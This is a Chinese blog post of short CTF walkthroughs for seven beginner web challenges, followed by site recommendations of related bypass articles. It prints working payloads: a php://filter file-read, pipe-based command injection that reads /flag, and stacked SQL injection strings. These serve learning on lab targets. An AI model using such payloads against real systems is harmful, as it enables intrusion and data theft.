每天一道ctf

已于 2022-10-20 20:09:19 修改
阅读量1.3k 收藏
点赞数
文章标签: web安全 安全 前端
于 2022-10-20 20:07:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whisper921/article/details/127433606
版权

一.[HCTF 2018]WarmUp

 查看源码,发现有一个source.php文件

 查看此文件,出现一堆PHP代码

发现里面有一个hint.php文件,查看一下

文件里说明flag在ffffllllaaaagggg里 

 得到flag

flag{5e4b3989-5ece-406b-8c40-458c3939bd7c}

二.[极客大挑战 2019]EasySQL

直接万能密码

 flag{866282ef-8b72-408c-8f99-7bfbeb7de6f6}

三.[极客大挑战 2019]Havefun

查看源代码

有一个cat变量,通过get方式传参,如果cat=dog输出flag
使用构造payload:/?cat=dog

 flag{d486eb52-eb03-4550-8f80-4ac5fc2817b6}

四.[ACTF2020 新生赛]Include

点击链接

出现了flag.php文件,?file=flag.php 猜测文件包含漏洞

php://filter协议,用base64编码的方式来读文件flag.php;这时页面会显示出源文件flag.php经过base64编码后的内容,然后经过base64解码就可以看到flag;

 payload: /?file=php://filter/read=convert.base64-encode/resource=flag.php

得到base64编码后的内容为:

 解码

 flag{55fc10f5-9f6f-40ba-8cb5-1e0146b36084}

五.[ACTF2020 新生赛]Exec

需要了解的知识点
ls(英文全拼:list files):用于显示指定工作目录下的内容(列出目前工作目录所含之文件及子目录)

cat(英文全拼:concatenate):用于连接文件并打印到标准输出设备上。

查看此文件的目录:127.0.0.1|ls

只有一个index.php

查看上级目录127.0.0.1|ls /

 查看flag:127.0.0.1|cat /flag

flag{a978ed20-b4c2-446c-9755-8beb871cb5c8}

六[强网杯 2019]随便注

 

查询3时报错,说明有两个字段

然后想尝试联合查询
结果报错return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
发现过滤了select|update|delete|drop|insert|where|\./i
爆数据库:1';show databases;#

爆表名:1'; show tables;#

出来两个表
1'; show columns from words;# 

1'; show columns from '1919810931114514';#
注意:表名为数字时,要用反引号包起来查询。

七. [SUCTF 2019]EasySQL

先判断一下是数字型还是字符型,输入1

试一下堆叠注入
爆出数据库:1;show databases;#

 爆表:1;show tables;#

 然后爆字段:1;show columns from FLAG;#,输入后回显Nonono.,猜测有被过滤

 直接构造payload为:*,1

 flag{3afd6880-acfb-41a5-9291-a532c250d013} 

whisper921
关注
[网络安全自学篇] 三十八.hack the box渗透之BurpSuite和Hydra密码爆破及Python加密Post请求(二)
杨秀璋的专栏
01-13 1万+
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文详细讲解了hack the box在线渗透平台获取邀请码、注册过程。本文将分享Web渗透三道入门题目,它们包括Python编写md5加密发送Post、万能密码和URL路径猜测、BurpSuite和Hydra密码爆破等。基础性文章,希望对您有所帮助!
命令执行的题目加理解
zbbjya的博客
03-21 811
听课笔记ctfshow的理解29 上图中我们会看到有一个preg_match 的函数进行正则表达式的匹配,成功返回1,否则返回0 要有分号不然出不来 phpinfo();使用时后要加分号 分号可以用?>代替 主要作用用法可以看这 https://blog.csdn.net/lituxiu/article/details/89330431?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164783517216781683952973%
1.实验吧——sql注入1(flag,到底过滤了什么东西? )
qwsn
11-08 3690
0x01:题目 实验吧——sql注入1网址 题目 http://ctf5.shiyanbar.com/423/web/ flag,到底过滤了什么东西? 0x02:WP复现 1.正常访问: http://ctf5.shiyanbar.com/423/web/ #如下图所示 2.输入单引号'测试: 在输入框里输入:' #如图所示,为GET型注入+字符型注入 http:/...
flag到底过滤了什么东西?
暴走灰太狼
11-04 2426
解题路径 先提交1试试看: 发现显示是正常的,然后再提交id=1': 说明'是可以影响SQL语句的,并没有被过滤掉 然后我们尝试id=1' or ''='发现空格和or关键字都没有被过滤,很好 再尝试看and关键字,令id=1' and 1=1 or''=':发现报错,将and换成大写也不行,看来是被过滤掉了 接着尝试使用()、/**/、/*!*/等方法绕过,发现/*!关键字*/的方法是可...
CTF命令执行小总结
n00bk1ng的博客
05-18 1767
文章目录简介命令执行常见命令及解释执行常见系统命令函数绕过姿势绕过总结函数套娃特殊题无字母无数字命令执行通过文件包含、文件上传拿shell进行命令执行FFI类型题例题ctfshow web31ctfshow web124 简介 命令执行 命令执行:攻击者可以通过web应用执行系统命令,从而获取敏感信息,甚至拿到shell权限等等,造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行。 常见命令及解释 执行常见系统命令 常见的系统命令可以进行命令执行: awk 格式:awk'{printf
ctf php审计从题目中的过滤学习绕过
eliforsharon的博客
10-10 1424
目录基本介绍空格过滤 基本介绍 在进行ping命令执行时,能够通过截断来执行新的命令。 根据此原理来进行注入。 例子如下 ip=127.0.0.1;ls 空格过滤 考虑在进行命令注入时,过滤了空格,可以采用${IFS}、$IFS、$IFS$9的局部变量来表示分隔符,但考虑$IFS直接接字母时可能会被解析成其他变量,所以采用${IFS}固定变量,或者$IFS$9采用$9这个空字符来与后面字母分隔开来固定变量 ...
CTF【每日一题20160610】
hhhparty的博客
06-10 6714
图片中的英语 一恒河沙中有三千世界,一张图里也可以有很多东西。 不多说了,答案是这个图片包含的那句英文的所有单词的首字母。 首字母中的首字母要大写,答案格式是wctf{一坨首字母} 加油吧少年!看好你哦~ -----------------------------------------------题目与答案的分界线----------------------------
CTF 【每日一题20160605】
hhhparty的博客
06-05 1351
【每日一题20160605】 ASCII码而已 \u5927\u5bb6\u597d\uff0c\u6211\u662f\u0040\u65e0\u6240\u4e0d\u80fd\u7684\u9b42\u5927\u4eba\uff01\u8bdd\u8bf4\u5fae\u535a\u7c89\u4e1d\u8fc7\u767e\u771f\u7684\u597d\u96be\u3002
CTF之二进制逆向分析 -- 密码学知识积累
lifanxin的博客
06-23 7299
密码学知识积累概述凯撒密码base64加密总结 概述   在ctf比赛中,逆向这块很大一部分都是在考查密码学的知识,其中需要逆向的代码基本都会是一些加解密的操作,因此有必要学习和积累一些常见的密码学知识。当然这里我们并不太需要知道如何使用密码学上的方法去破解加密密文,如果一定要破解的话,也是有工具和对应程序实现的。因此我们要做的就是去熟悉这些密码学的加密方式,并在逆向代码中认出来。 凯撒密码   凯撒密码(Caesar),相传为凯撒所创,属于古典密码学中的移位密码。这种加密方式比较简单,就是将字母的对应关系
写一下自已对ctf的了解,以便日后自已需要
m0_50987622的博客
11-07 6021
11.7 本人ctf小白,参加比赛基本处于摸鱼状态,也没有系统了解过ctf以及做过相关的实践和练习,但是,对这一块比较感兴趣,所以,只能说,在学习中,就跟我当初学makefile一样,做下记录,写点自已觉得对自已有用的东西,大概这样。 ctf总共分为五部分,misc杂项,crypto解密加密,pwn攻破设备、系统,reverse逆向渗透,web网络安全。500pt的题都很难。 首先,建立在你对前后端足够了解的基础上。 web安全就是黑服务器,pwn就是黑设备黑系统,至于怎么黑,仁者见仁智者见智,取决
有趣的黑掉卫星Hack-A-Sat CTF比赛——模拟卫星视角beckley
hackasat的博客
11-11 1857
黑掉卫星挑战赛Hack-A-Sat中有一道有趣的题目,给了一张卫星拍摄的照片,需要找到卫星是从哪个角度拍摄的,找到后,就会给出正确的flag
实验吧ctf-web题:这个看起来有点简单
Elvira
08-22 7490
sql注入,sqlmap,union,information_schema
sql注入绕过方法总结
热门推荐
test
10-10 4万+
前言 sql注入的原因,表面上说是因为拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量;但是更深层次的原因是,数据库将用户输入的字符串,当成了 “sql语句” 来执行。 简而言之:用户输入的数据变成了代码被执行 string sql = "select id,no from user where id=" + id; 我们希望用户输入的 id 的值,仅仅作为一个字符...
buuctf blacklist
ANYOUZHEN的博客
05-26 312
这是一道sql注入题目,我们先来尝试对它进行闭合,payload:1' 使用联合查询,构造payload: ?inject=1' union select 1,2--+ 过滤了许多东西: /set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i 其中的select被过滤掉了 尝试使用报错注入进行突破: ?inject=1' and extractvalue(1,concat(0x7e,(databa..
SQL注入的一般方法总结(含WAF绕过) ctf
NLost
03-20 7040
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器 上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 下面分享几种常见的SQL注入常见绕过方法:以下以 **index.php?id=1** 为例绕过
Ctfer训练计划】——命令执行的解题技巧(持续更新中)
m0_59598029的博客
01-27 1053
一、关键字绕过1、cat限制绕过2、$限制绕过3、点号限制绕过(2023.1.4)4、空格限制绕过5、php限制绕过二、另类变形写法1、eval双重参数覆盖(2022.12.31)2、include双重参数覆盖(2023.1.3)3、闭合双重参数绕过(2023.1.5)4、data伪协议配合include函数命令执行三、奇淫巧技思路1、另类种马思路(2023.1.3)2、highlight_file高级显示(2023.1.4)3、字符串匹配(2023.1.4)
记录CTF命令执行练习中遇到的几道题(一些PHP命令过滤的绕过方法)
weixin_40103894的博客
10-01 1660
【代码】记录CTF命令执行练习中遇到的几道题(一些PHP命令过滤的绕过方法)
CTF 命令执行绕过总结
最新发布
jnszstmei的博客
06-01 489
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示。或:rce-xor-or.php & rce-xor-or.py。# ls -t >shell 将输出输入到shell文件中。异或:rce-xor.php & rce-xor.py。%09(url传递)(cat%09flag.php)sh /flag 2>%261 //报错出文件内容。2、1使用空变量$*和$@,$x,${x}绕过。7、异或无符号(过滤0-9a-zA-Z)more:一页一页的显示档案内容。
[HCTF 2018]WarmUp全网最详细解释
Welcome To Myon'Blog !
11-08 3824
对'hint.php'执行mb_substr函数,但是函数内一个参数是来自另一个函数mb_strpos的返回值,因此我们先看mb_strpos函数,使用.进行字符连接,即连接了一个问号字符 '?',得到hint.php?因为我们当前的source.php一般是在html目录下,往上是www,var,然后到根目录,flag一般就放在根目录下面,这里还有一个hint.php?检查'hint.php'是否在白名单中(白名单包括hint.php和source.php),在,继续执行后面的代码;
webCTF文件包含
04-24
WebCTF文件包含是一种常见的Web安全漏洞,也被称为文件包含漏洞。它指的是在Web应用程序中,未正确过滤用户输入导致恶意用户可以通过构造特定的请求,将本应该被限制访问的文件包含到页面中。 文件包含漏洞通常存在于动态网页中,其中包含了用户可控的参数,如URL参数、表单提交等。攻击者可以通过修改这些参数,使得应用程序将恶意文件包含到页面中,从而执行任意的代码。 攻击者利用文件包含漏洞可以实现以下攻击: 1. 读取敏感文件:攻击者可以读取服务器上的敏感文件,如配置文件、数据库凭证等。 2. 执行任意代码:攻击者可以通过包含恶意代码文件,执行任意的系统命令或者脚本。 3. 远程文件包含:攻击者可以通过包含远程服务器上的文件,实现远程代码执行。 为了防止文件包含漏洞,开发人员应该采取以下措施: 1. 输入验证和过滤:对用户输入进行严格的验证和过滤,确保只允许合法的输入。 2. 文件路径限制:限制用户输入的文件路径只能访问指定目录下的文件,避免访问敏感文件。 3. 使用白名单:限制可包含的文件列表,只允许包含指定的文件,避免包含任意文件。 4. 避免直接包含用户输入:尽量避免直接将用户输入作为文件路径进行包含,可以使用间接方式,如通过参数传递。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值